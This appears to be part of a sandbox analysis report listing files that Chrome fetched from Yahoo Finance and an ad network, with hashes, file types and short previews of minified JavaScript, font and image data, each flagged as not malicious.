                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as x,b as y,e as z,j as E,d as S,f as w,i as b,q as v,L as D,k as L,l as B,x as ee,a5 as le,H as te,p,z as ie,t as H,h as q,m as C,n as T,c as ne,u as ae,g as se,a as fe,K as F}from"./scheduler.Dsuh-FKt.js";import{S as oe,i as re,t as k,g as N,a as g,e as M,c as V,b as j,m as K,d as O}from"./index.CvwOawEI.js";import{e as G}from"./each.CI2tb2RB.js";import{c as J,g as Q}from"./seoUtil.BURv1pYY.js";import{I as ce}from"./Icon.C8w5V9EK.js";import{L as ue}from"./chevron_left.CltsmSmq.js";import{L as $}from"./Link.vSNQugO0.js";function R(s,e,l){const t=s.slice();t[14]=e[l],t[17]=l;const i=t[17]===t[0].length-1;return t[15]=i,t}function P(s){const e=s.slice(),l=e[0][e[0].length-2];return e[18]=l.href,e[19]=l.i13n,e[20]=l.title,e}function U(s){let e,l=J(Q(s[0]))+"",t;return{c(){e=new te(!1),t=p(),this.h()},l(i){e=ie(i,!1),t=p(),this.h()},h(){e.a=t},m(i,a){e.m(l,i,a),L(i,t,a)},p(i,a){a&1&&l!==(l=J(Q(i[0]))+"")&&e.p(l)},d(i){i&&(b(t),e.d())}}}function W(s){let e,l;return e=new ce({props
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):100027
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.556157005488767
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:LQyuxk+8B+EsbynP0FSYoU24j083ocjw3oAPO7IIh0KcHJrtI3CDig:N/dUR3S3oAWBh1cHzIyDig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B793199BA4EC3E8B8D07E1D7E989376B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F39B8E72586EF748C050FB0F7F09250DD8B272A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C948E1955EBB57595EDD96FD014EEC801A66EA3499C3F6C21D5132F820CA6B54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FD3694F49C18F5293BF78D739EF6AF495B477FE20C5371BBFF1F6863826DF673E5394F9FBB5CF71B3CCD0BC0E1338EEE440CC97231CF000123A67B829B2AEA47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://contextual.media.net/nmedianet.js?cid=8CU231JW5&ydspr=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview: (function(){;var _mN = {"_prid":"8PRVCXX19","_cid":"8CU231JW5","_cpcd":"1q2hheLtHh-AcmK5Yw953A==","_sizemovl":{"df":"320x50","ipad":"728x90"},"_verId":"9111299","_oref":"","_optout":"","_uencru":"1","_limgBeac":true,"_popUrl":"https:\/\/lg3.media.net\/log?logid=kfk&evtid=popup","_shftstr":"sdFlrDO6w94_aNInZitEo1LKByW5-vz8jhqSHcmCA=XkR0JVepPuU7b2xfg 3MT\/GYQ|~","_shftn":9,"_ydspr":"1","_lbt":"200","_dpuc":"1","_L2ISrc":"1","_mcf":"55869","_https":"1","_dcSplit":{"G":"100"},"_cfo":["BI","BY","CD","CU","IQ","IR","LB","LY","KP","NI","SD","SO","SS","SY","VE","CF","YE","ZW","ML","IL","RU"],"_cntDetConf":{"parents":2},"_lw":1,"_smp":"smtr","_smwp":"sr\/2722522032\/SAFEFRAME.js","_rtbsC":{"YBNCABID":["1","4","9","7","6","92","132","223"]},"_dpid":"8POS023L1","_dyApi":"https:\/\/contextual.media.net\/dtp.js?","_el2shd":"100","_l2qek":["fnAtVW*uFLkzK(","7pxsTUl)ChSE-Q","_Pjwb4ogM0dvBG","Hmyc9OeR.ZqY5!","NiaJ~D23XI816r"],"_dUrl":"https:\/\/contextual.media.net","_lHst":"https:\/\/lg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):100027
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.556250977410639
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:MQy9xk+8B+EsbynP0FSGoU24j083ocjw3oAPO7IIh0KcHJrtI3CDig:R/3UR3S3oAWBh1cHzIyDig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:29961C139B38F8428CA5ADF4F36C677C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:74E179DA04B9D00BFFEC5C039B920A893AF0C593
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0AE8320BD039DD34057C3712845C7C4AC4AF0E3BB83590B400B690AE4508FA01
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AC4EDC69839B4466A13885A78F10C0D3FE8F225984C4B7A039C8762F4744B678892DBD7BC0132312339D7F9CD258C2514B7445765A96E297F1D98C92D78D9C78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview: (function(){;var _mN = {"_prid":"8PRVCXX19","_cid":"8CU231JW5","_cpcd":"1q2hheLtHh-AcmK5Yw953A==","_sizemovl":{"df":"320x50","ipad":"728x90"},"_verId":"9111299","_oref":"","_optout":"","_uencru":"1","_limgBeac":true,"_popUrl":"https:\/\/lg3.media.net\/log?logid=kfk&evtid=popup","_shftstr":"sdFlrDO6w94_aNInZitEo1LKByW5-vz8jhqSHcmCA=XkR0JVepPuU7b2xfg 3MT\/GYQ|~","_shftn":9,"_ydspr":"1","_lbt":"500","_dpuc":"1","_L2ISrc":"1","_mcf":"55869","_https":"1","_dcSplit":{"G":"100"},"_cfo":["BI","BY","CD","CU","IQ","IR","LB","LY","KP","NI","SD","SO","SS","SY","VE","CF","YE","ZW","ML","IL","RU"],"_cntDetConf":{"parents":2},"_lw":1,"_smp":"smtr","_smwp":"sr\/2722522032\/SAFEFRAME.js","_rtbsC":{"YBNCABID":["1","4","9","7","6","92","132","223"]},"_dpid":"8POS023L1","_dyApi":"https:\/\/contextual.media.net\/dtp.js?","_el2shd":"100","_l2qek":["fnAtVW*uFLkzK(","7pxsTUl)ChSE-Q","_Pjwb4ogM0dvBG","Hmyc9OeR.ZqY5!","NiaJ~D23XI816r"],"_dUrl":"https:\/\/contextual.media.net","_lHst":"https:\/\/lg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4348), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.175097086994074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:3haIoq1mr8gYdYjeL+Pvq51pNAcllADTyBnmYCoqvpt4bIs:3uuA8gYSjeL+XI1pNZlls+CA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:681D57E9E7CBEF5DE44544C13F8CA62E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:65CFB6398D61FE7CAC86C90DC042095D8E3CD623
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EF70829B2E58AFC016C35CE9A83E2BB60AD24D6341491686EE168EE71C40123F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2A131198DBB855882D7C7B687650B57133C4375FCEA4E4A86D338A78DCAEAFC18DC5477593429B6B1A599419F108F4BEBE7588BAE7C7831B5EA87D6C2BDF65C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-countdown-1.2.5-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-countdown",[],t):"object"==typeof exports?exports["wafer-countdown"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-countdown"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (532)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):533
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.670528886422098
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:eT9mc4sl3O9Mtk/CIv4Sbx7WiPorWhFMDFQ3m4yy/0U2Xdv6j0VvKpVkQoLnLS7A:eR10MSJbx7TPXTMDFQ370Usd8k/HoDk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:88F5B4E659159BF2B0E6DE4B8B09CC0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1A2F1531158A51BA2D776A97A9724AB2B3CF7A4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B31DF7EB98896B4E334E1327685A4A0CB06293B21EC4882C0415DDC9F9AE9B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6D9D1813D42E9AE80F17FD332BD5BDAC9466BB12F750AD058216B7738C81BF727706E242DAA62BA2F560F4DB3DD451EA8A6AA9DC7BDB5E4BF7F908F0BE8AD8E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const c='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill-rule="evenodd" d="M17 8V6c0-2.76-2.24-5-5-5S7 3.24 7 6v4h.2c-1.12 0-1.68 0-2.108.218a2 2 0 0 0-.874.874C4 11.52 4 12.08 4 13.2v5.6c0 1.12 0 1.68.218 2.108a2 2 0 0 0 .874.874C5.52 22 6.08 22 7.2 22h9.6c1.12 0 1.68 0 2.108-.218a2 2 0 0 0 .874-.874C20 20.48 20 19.92 20 18.8v-5.6c0-1.12 0-1.68-.218-2.108a2 2 0 0 0-.874-.874C18.48 10 17.92 10 16.8 10h.2zm-1.9 2H8.9V6c0-1.71 1.39-3.1 3.1-3.1s3.1 1.39 3.1 3.1z" clip-rule="evenodd"/></svg>';export{c as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):24889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.971178999317647
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:TofVRJJCUL66uCiS6VgbvzfnUWwsmLvVhcD0KKgBp8EGXCbc4g8d1oK:ObJCU6JCitgbvb1kGDIgBp8EuN0WK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6976AD679FB45035FC162B130F77FC44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7D6B57436377C82C7AA0AD753E48CED1C84C2576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AAFC527333E01552F98663A59D40D4A7F58A6E99A0D4CCAD1388E7E7D9108079
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:634D1E4F7F0CA680818C428BB2DEB912642A74592C1C5ADE4A13EAAB04A4EC0B4F973DBC793593947DD07868BC886EE493D18EC16E434860924C9FEB922768C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C.........................................................................,............................................M.........................!.1..A.."Qa2q....#B.3Rr.....$b...4CS.......Eds.....................................8.........................!.1..AQ."#23Baq..$R...%..&4b.............?...8.~....|..}..t.;.,...Th>....}K....~..J.rs.yp#.Dz../4.=;..Xd}..7..T...>.`..:.dE....../..h.M.s....>|......}.~.XW09....{...%.....h..L...q..........|..YUi.z@.....t.s.........X7^.e..U.}.M?.t.|...5.{...l..;..H....8...Q..k.K=.R.%..f..o............*..B...'...QT.D...w..ts.L.y.....>.}.Q`.2....P&........W ...'....t1.pXS$..kd2ad........`{..Q.M.S.k.....I-...~.<...O$...~....Y4O..h.'6..f.O.i...,>.YX.......\..w.Gq..(........*i.I<..V......o.q...........E,hH.........8.K..*.7-....,YX*....uy4e4l..Y)..>..2....^...X..k.T.q....I]..y..biq.....v..N&....E.}...ou.P.e..>[....O...7..y.e.Y.......
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1729)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1730
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2717333209287425
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:BZEChRgbGbzbLcp1UaVOK2Ld0IOs9Vd/HqBMb:B+ChRgyXfA1UaVOKg0A95b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F33E1CE039CACA503D4980D3EA747110
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB674D0EB044888293EC08A7943B70EDA9B1878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2B7A6117421958626D29847F0888D4C4DF9D67FD74D0708C6E21D43288D3A5E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:37BB36FF6F76F89DE8901744FAAC0B6C17E5B5AE6ED470073C3E7D17FC8D1C32E7567918CD3B97A5648CF9D9A4D68B3F4C2A1B5D9D59F5935C14812D293B1C6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as S,h as b,c as A,j as N,E as _,k as h}from"./commonUtil.BWwawKjd.js";import{f as L,l as O}from"./logUtil.CCV3qKPL.js";import{l as q}from"./loadQuote.BOFhtUlf.js";const T={add:{perfLabel:"addPositions",operandName:"symbol",operationToPerform:"position_insert"},delete:{perfLabel:"deletePositions",operandName:"posId",operationToPerform:"position_delete"},reorder:{perfLabel:"reorderPositions",operandName:"posId",operationToPerform:"position_update"}};function D(e,t,i){const{action:o}=e,{operandName:d,operationToPerform:a}=T[o];let s=!1;if(o==="add"){const{insertAtEnd:n=!1}=e;s=n}return t.map((n,r)=>({operation:a,[d]:n,...o!=="delete"&&{sortOrder:s?i+r:r}}))}const F=e=>e?Array.isArray(e)?e:e.split(","):null;async function B(e,t){var y,P,I;const i=await S(e);if(!b(i)||!((y=i.user)!=null&&y.guid))return null;const{pfId:o,silent:d=!1,action:a}=t,[s]=await A(["portfolio"],e),n=i.user.guid,r=a==="add",{perfLabel:f}=T[a],l=r?F(t.symbols):t.posIds;if(!o||!l||!l.length)return null;let c=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2300)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.319919047219747
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:aWPJa/nJA+8CjMIwzVJh+BF8ySlJUE8+bP7KMchIPoySEmZV3Sya:aWPJa/Jnp2zvh+BFZgUEpbmMEGoumM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BDC324150050C7C11A610327781C2006
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8C01111923E67D2F5385029C57807C73A53FC246
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F616EF28BEFC9584304F03A52DF4F203669E03067A23FA3371C4C029B4465097
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0D9E8284E12A06969C99872CF0CCDAC8762B68BA4E24D4DA36BB561DFECA638B4007F4F01DB836DD5F00AAD2504B2949A170E9551D8E7DBC4F0A014B252FB4FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as v,p as g,k as h,n as s,i as o,A as w,e as q,t as V,d as C,f as E,h as S,B as k,l as A,J as H}from"./scheduler.Dsuh-FKt.js";import{g as N}from"./spread.CgU5AtxT.js";import{S as R,i as B}from"./index.CvwOawEI.js";function F(i){const e=i.slice(),t=e[4]||{};return e[10]=t.fmt!==void 0?t.fmt:"-",e[11]=t.raw!==void 0?t.raw:"-",e}function y(i){let e,t=i[10]+"",_,u,n,a,d=[{"data-test":"change"},{"data-symbol":i[3]},{"data-field":u=i[1].id},{"data-trend":"none"},{"data-pricehint":n=i[0].original.priceHint},{"data-value":a=i[11]},i[2]?{active:""}:{}],f={};for(let l=0;l<d.length;l+=1)f=w(f,d[l]);return{c(){e=q("fin-streamer"),_=V(t),this.h()},l(l){e=C(l,"FIN-STREAMER",{"data-test":!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-pricehint":!0,"data-value":!0});var c=E(e);_=S(c,t),c.forEach(o),this.h()},h(){k(e,f)},m(l,c){h(l,e,c),A(e,_)},p(l,c){c&16&&t!==(t=l[10]+"")&&H(_,t,f.contenteditable),k(e,f=N(d,[{"data-test":"change"},c&8&&{"data-symbol":l[3]},c&2&&u!==(u=l[1].id)&&{"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 65176, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):65176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.996782865840981
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:dJDFHWg/7CxUjbXmJ9U10h5An23d5X0LcpSOwHfvMQv:dJT/7CxUvmKgAakLcpSpHfU0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4DF4FCE99E5A3C3D1493112A0159071
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D6CE384A32EC1D859406D6E4EBE3FE547DB3B82A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C77AC0AA1AA3C9715CACB1FC76FEAF226E30927A9636E5C75C4DFEB75C0F8F98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AF1F4EFF0DEB18BA2628D82BB6CA16D6340DC797A438B13F29929DB1548155F82FD1840D18C275438F5EC251A6E82670E2FF89477F1334E1CD45422E02E8EEDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/ngy-fonts/YahooSans-VF-Web.woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:wOF2..............^....*........................../......z?HVAR.w.`?STAT..../d......O..6.0..F.6.$..f. ..|..9[.G....h,j+n..mD.gn.V....<..c1=..2..~.....v.^........%..[3.......f..f..?.aD.......y..T..;O.s~.......r~{.?..t.v. .D.K_...tV...7.J..-2.:F.DDD....;.j.....uRh.e<.(..JD..g.SE..6<...4..{Q....4a!..D...)`..B5..%.9..%a.....ga..2z.l....J......l.*...y"[.W ..,# .*gL.3~..Y.S.sx..7.b*....TAT..!..~6<..`....|E...S.W.|7..^.a....%2.KJ.Iu;...Z3".|.!..D..!,.S.."W]z..O.>..`r...PJ,.9)D..k<n.@.%..^N...b...`.E..w.#........SE.'..M.vG.e'.2.._......m....w494.._........~.}N...^h...QmF.;.~U...q.........u.Q....p.5.l.(...U.~.....5c.3q:..[S..s.y..(J...V.....bc.haTY.Qg..W.V\xQi......g.....'\.o.".....=..BI..A.d|....7'&.!...o..5D;K..W<tJ j..Cs+..%.&.0.........>N.1...).aP..G.co..6...s.c.....?6..&Q...`lx_.)....0u.....}.1...6..&mv...D&....M.. .L..aXDd.D.)Md...I.AL.I....5}.-./n3.tS..5.q..%.~.r^h.e.n./..CJ69... .......T..g.....}.3.z....%.7.":%......'Z4\.....0....M?.NE.8)ZjHVr.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (5089)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7143
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.424545268931904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:oiJthcxZ6OTzjT/xwmQfTfMN29IckJKqWIV8rzDr40E4dyufIsO:JtCC5fi2vqPV8rPr40E4btO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8AA71C5824A4E2A661B34E35C2418F1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:536D19158C35C5398F831F4E3D287AF5EB94EB37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FF06D19705536A1C02E3E364057F77AB3F37FAE4DFEBC4EA2FFAA6B69A7A3627
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:81AF6DEF16B052972905EA61FCB543AA218DE0339B1057C2D63DC0D005F4AEEBC2888374E97033BF6F6AC34C36B55F317E282D1E7E4AA880B6B43D96818CA88B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Conversations.CDNUlVzo.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Y,e as b,b as M,d as E,f as k,j as O,i as h,q as I,L as z,k as v,l as y,I as ee,y as te,t as D,h as F,Q as oe,n as J,p as G}from"./scheduler.Dsuh-FKt.js";import{S as se,i as ne,t as g,g as N,a as w,e as R,c as L,b as j,m as U,d as V}from"./index.CvwOawEI.js";import{E as re}from"./error_outline.CkdKfkE_.js";import{I as ie}from"./Icon.C8w5V9EK.js";import{R as ae}from"./RMP.G38kzltP.js";import{S as le}from"./SkeletonLoader.D0M7dqCu.js";import{t as H,a3 as Q}from"./commonUtil.BWwawKjd.js";import{b as ce}from"./index.rV6zwFgL.js";const fe=["openweb_","ow_","ow-","spot_im","spot_reset_password","spot_ticket","spotim_","tenant_config"],X=330,ue=n=>n.slice(1).split("&").filter(e=>fe.some(t=>{const[s,o=""]=e.split("=");return s==="ref"&&o.indexOf("spot-im")===0?!0:s.indexOf(t)===0})).join("&"),de=({contentType:n="",fullScreen:e=!1,height:t=X,launcherUrl:s="",messageCount:o=0,siteAttribute:i="",spotId:d="",url:c="",uuid:l="",width:m=0}={})=>{const[,f="yahoo"]=[.../rs="lmsid:([\w]+);?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (49223)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):58551
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.269644313777682
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:QKaXx0jVTbawOPjwgwMwaq9HcZflvcNbIJVtXirpqnr3m:QKaXxDwOPZflvcNWVtXirpwr3m
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:81F4C6D5668F3B59C83F55DD74ED3635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:72C80C025FBE08E933BCB71981C87F05684E262E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:70D215DCC7AECCE9B9BEB27C951796F42BF8E5084DF941C4B7F292CD8F72513F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DFD16DB2EDE9CD7175912C854D8515A048CAD566EE5942DCB15BD01798473BF1AD33A01693407BF648D81CFE0343091F75E64BCA1E726B696FB8967628407052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{v as ke,ah as qe,am as fe,al as je,E as Ne,s as ie,n as k,t as Ue,h as Xe,k as Ke,m as We,i as Ze}from"./scheduler.Dsuh-FKt.js";import{S as q,i as le,c as ve,b as _e,m as Fe,t as $e,a as xe,d as Me}from"./index.CvwOawEI.js";import{c as pe,w as Ye,d as Je}from"./43.BgWy8GOF.js";import{I as Qe}from"./Icon.C8w5V9EK.js";const be=/[&"<]/g,et=/[&<]/g;function tt(e,o=!1){const t=String(e),n=o?be:et;n.lastIndex=0;let r="",i=0;for(;n.test(t);){const l=n.lastIndex-1,s=t[l];r+=t.substring(i,l)+(s==="&"?"&amp;":s==='"'?"&quot;":"&lt;"),i=l+1}return r+t.substring(i)}function nt(e,o){if(!e||!e.$$render)throw new Error(`<${o}> is not a valid SSR component. You may need to review your build config to ensure that dependencies are compiled, rather than imported as pre-compiled modules. Otherwise you may need to fix a <${o}>.`);return e}let N;function Ve(e){function o(t,n,r,i,l){const s=je,u={on_destroy:N,context:new Map(l||(s?s.$$.context:[])),on_mount:[],before_update:[],after_update:[],callback
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
